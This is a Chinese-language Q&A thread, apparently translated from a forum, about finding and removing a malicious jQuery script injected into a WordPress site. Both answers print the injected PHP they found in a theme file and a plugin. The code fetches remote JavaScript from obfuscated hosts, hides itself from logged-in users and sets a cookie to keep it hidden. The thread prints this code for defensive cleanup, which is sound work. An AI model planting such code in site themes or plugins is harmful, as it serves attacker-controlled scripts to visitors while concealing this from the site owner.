在 WordPress 中查找链接和包含该链接的文件

Question

我有一个基于 WordPress 的网站。检查源代码时（ctrl+u）会弹出一个链接：

  <script type="text/javascript" src="https://www.9iwp.org/jquery.js">

它是什么，我在源文件中的哪里可以找到它？它应该是有害的，我需要摆脱它。我已经浏览了每个可用文件的每一行代码，但不知道该去哪里找。有什么建议吗？

Answer 1

我已通过替换另一个不被视为恶意软件的链接解决了这个问题。我无法找到注射的位置，但至少现在我的网站是“安全的”。您必须在模板的 functions.php 文件的末尾添加此代码：

add_action('wp_footer', 'my_start_footer_ob', 1);
function my_start_footer_ob() {
    ob_start("my_end_footer_ob_callback");
}

add_action('wp_footer', 'my_end_footer_ob', 1000);
function my_end_footer_ob() {
    ob_end_flush();
}

function my_end_footer_ob_callback($buffer) {
    // remove what you need from he buffer
    $buffer = str_replace('www.9iwp.org/jquery.js',"www.mysite.org/wp-content/themes/Mytheme/assets/js/empty.js",$buffer);
    return $buffer;
}

更新！！

我找到了！

这是模板函数文件之一中的“注入”（在我的例子中是 framework/functions/helpers.php）

if(!function_exists('wp_func_jquery')) {
    if (!current_user_can( 'read' ) && !isset(${_COOKIE}['wp_min'])) {
        function wp_func_jquery() {
            $host = 'http://';
            $jquery = $host.'lib'.'wp.org/jquery-ui.js';
            $headers = @get_headers($jquery, 1);
            if ($headers[0] == 'HTTP/1.1 200 OK'){
                echo(wp_remote_retrieve_body(wp_remote_get($jquery)));
            }
    }
    add_action('wp_footer', 'wp_func_jquery');
    }
    function wp_func_min(){
        setcookie('wp_min', '1', time() + (86400 * 360), '/');
    }
    add_action('wp_login', 'wp_func_min');
}

找到该函数并将其删除。

Answer 2

在我的网站中，它嵌入在插件中：

    if(!function_exists('wp_func_jquery')) {
    function wp_func_jquery() {
        $host = 'http://';
        echo(wp_remote_retrieve_body(wp_remote_get($host.'ui'.'jquery.org/jquery-1.6.3.min.js')));
    }
    add_action('wp_footer', 'wp_func_jquery');
    }